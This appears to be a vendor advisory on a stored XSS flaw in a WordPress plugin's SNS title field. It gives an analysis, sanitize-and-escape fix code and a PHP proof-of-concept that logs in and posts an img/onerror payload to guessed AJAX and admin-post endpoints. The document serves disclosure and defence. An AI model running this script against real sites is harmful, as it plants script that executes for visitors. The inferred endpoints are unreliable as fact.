Atomic Edge analysis of CVE-2025-11737 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the VK All in One Expansion Unit WordPress plugin. Attackers with Contributor-level or higher permissions can inject malicious scripts via the ‘vkExUnit_sns_title’ parameter. The injected scripts execute in the context of any user viewing the compromised page, leading to client-side attacks.
Atomic Edge research infers the root cause is insufficient input sanitization and output escaping for the ‘vkExUnit_sns_title’ parameter. The CWE-79 classification confirms improper neutralization of input during web page generation. The vulnerability description states the issue exists in all versions up to and including 9.112.3. Without a code diff, Atomic Edge concludes the plugin likely fails to apply adequate sanitization functions such as `sanitize_text_field` during input processing or `esc_attr` during output rendering for this specific parameter.
Exploitation requires an authenticated session with at least Contributor-level access. The attacker likely submits a crafted POST request containing malicious JavaScript within the ‘vkExUnit_sns_title’ parameter. This parameter is associated with a social sharing or meta title feature. The endpoint is probably an AJAX handler (`admin-ajax.php`) or a POST request to an admin page that saves plugin settings. A payload such as the one in the proof-of-concept script below would be typical. The script is stored persistently and triggers when any user loads a page that outputs this title.
The remediation in version 9.112.4 likely involves implementing proper input validation and output escaping. The fix should sanitize the ‘vkExUnit_sns_title’ parameter on receipt using WordPress core functions like `sanitize_text_field` or `wp_kses`. It must also escape the parameter on output in frontend templates using functions like `esc_attr` or `esc_html`. This dual-layer approach follows WordPress security best practices for neutralizing XSS vectors.
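The two-layer pattern described above, shown as an added example that is not code from the plugin or from Atomic Edge: the raw-in/raw-out handling the analysis infers, beside a save path that sanitizes on receipt and a render path that escapes for the output context. Only the parameter name `vkExUnit_sns_title` comes from the advisory; the function names, the option handling and the sample POST body are constructed for illustration. The stand-ins for `sanitize_text_field`, `esc_attr` and `esc_html` are only there so the file runs with plain `php` outside WordPress, where core defines the real functions.

```php
<?php
// Stand-ins so this file runs outside WordPress. Inside WordPress, core
// already defines these and the blocks below are skipped.
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($str) {
        $str = strip_tags((string) $str);                    // drop tags
        $str = preg_replace('/[\x00-\x1F\x7F]/', '', $str);   // drop control chars
        return trim($str);
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Constructed sample POST body standing in for what a Contributor submits.
$post = array('vkExUnit_sns_title' => '<img src=x onerror=alert(1)>Our site');

// --- Inferred vulnerable pattern (CWE-79): value stored and printed as-is. ---
function vulnerable_save(array $post) {
    return $post['vkExUnit_sns_title'];   // no sanitization on receipt
}
function vulnerable_render($title) {
    // Printed into a text node with no escaping: markup in $title is live HTML.
    return '<span class="sns-title">' . $title . '</span>';
}

// --- Hardened pattern: sanitize on receipt, escape on output. ---
function hardened_save(array $post) {
    return sanitize_text_field($post['vkExUnit_sns_title']);
}
function hardened_render($title) {
    // esc_attr for an attribute value, esc_html for a text node; the escaping
    // function is chosen by where the value lands, not by where it came from.
    return '<meta property="og:title" content="' . esc_attr($title) . '">' . "\n"
         . '<span class="sns-title">' . esc_html($title) . '</span>';
}

$raw  = vulnerable_save($post);
$safe = hardened_save($post);

echo "vulnerable output:\n" . vulnerable_render($raw) . "\n\n";
echo "hardened output:\n" . hardened_render($safe) . "\n\n";
// A value written before the fix is still in the database; escaping on output
// neutralizes it even though it was never sanitized.
echo "hardened render of the previously stored raw value:\n" . hardened_render($raw) . "\n";
```

In a real plugin the input half is wired up once by passing `sanitize_text_field` as the `sanitize_callback` argument of `register_setting()` (or of `register_meta()` for per-post values), so every save path goes through it; the output half has to be applied at each template site. Keep both layers: since Contributors can legitimately set post-level titles, a capability check alone would not close this hole, and values stored before the fix only become safe through output escaping.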
Successful exploitation allows attackers to perform actions within the victim’s browser session. This can lead to session hijacking, content defacement, or redirection to malicious sites. When the victim is an administrator, this could facilitate privilege escalation by stealing cookies or manipulating administrative interfaces. The stored nature amplifies the impact, as the payload executes for all future visitors until it is removed. The CVSS base score is 6.4 with Scope: Changed, indicating the vulnerability can affect components beyond the plugin’s own security scope.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-11737 - VK All in One Expansion Unit <= 9.112.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via SNS Title
/**
* Proof of Concept for CVE-2025-11737.
* This script simulates an authenticated attack by a Contributor-level user.
* It targets the 'vkExUnit_sns_title' parameter, which is inferred to be part of a plugin settings update mechanism.
* The exact endpoint is not confirmed; this PoC assumes a common WordPress AJAX pattern.
* Replace $target_url, $username, and $password with valid credentials for testing.
*/
$target_url = 'https://example.com';
$username = 'contributor_user';
$password = 'contributor_password';
// Payload for stored XSS. This will execute when a user views a page containing the injected title.
$malicious_title = "<img src=x onerror=\"alert('Atomic Edge XSS via vkExUnit_sns_title')\">"; // double-quoted PHP string so the inner quotes do not terminate it
// Initialize cURL session for WordPress login to obtain authentication cookies.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save session cookies
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$login_response = curl_exec($ch);
// Check login success by looking for a dashboard redirect or absence of login form.
if (strpos($login_response, 'wp-admin') === false && strpos($login_response, 'Dashboard') === false) {
die('Login failed. Check credentials.');
}
// Atomic Edge research assumes the plugin uses an AJAX handler or admin POST endpoint to save settings.
// Two common patterns are tested. The first targets admin-ajax.php with a plugin-specific action.
$ajax_endpoint = $target_url . '/wp-admin/admin-ajax.php';
$ajax_params = array(
'action' => 'vk_exunit_update_sns_settings', // Inferred action name based on plugin slug
'vkExUnit_sns_title' => $malicious_title,
'nonce' => '' // Nonce would be required; its absence or validation bypass is part of the vulnerability context.
);
curl_setopt($ch, CURLOPT_URL, $ajax_endpoint);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($ajax_params));
$ajax_response = curl_exec($ch);
// If the AJAX attempt fails, try a direct admin POST to a plugin options page as an alternative.
if (strpos($ajax_response, 'success') === false && strpos($ajax_response, 'updated') === false) {
$admin_post_url = $target_url . '/wp-admin/admin-post.php';
$admin_post_params = array(
'action' => 'vk_exunit_save_options',
'vkExUnit_sns_title' => $malicious_title
);
curl_setopt($ch, CURLOPT_URL, $admin_post_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($admin_post_params));
$admin_response = curl_exec($ch);
echo "Admin POST attempt completed. Check response for success indicators.\n";
echo 'Response length: ' . strlen($admin_response) . "\n";
} else {
echo "AJAX request submitted. Payload may be stored.\n";
echo 'Response snippet: ' . substr($ajax_response, 0, 200) . "\n";
}
curl_close($ch);
// Clean up cookie file
if (file_exists('cookies.txt')) {
unlink('cookies.txt');
}
?>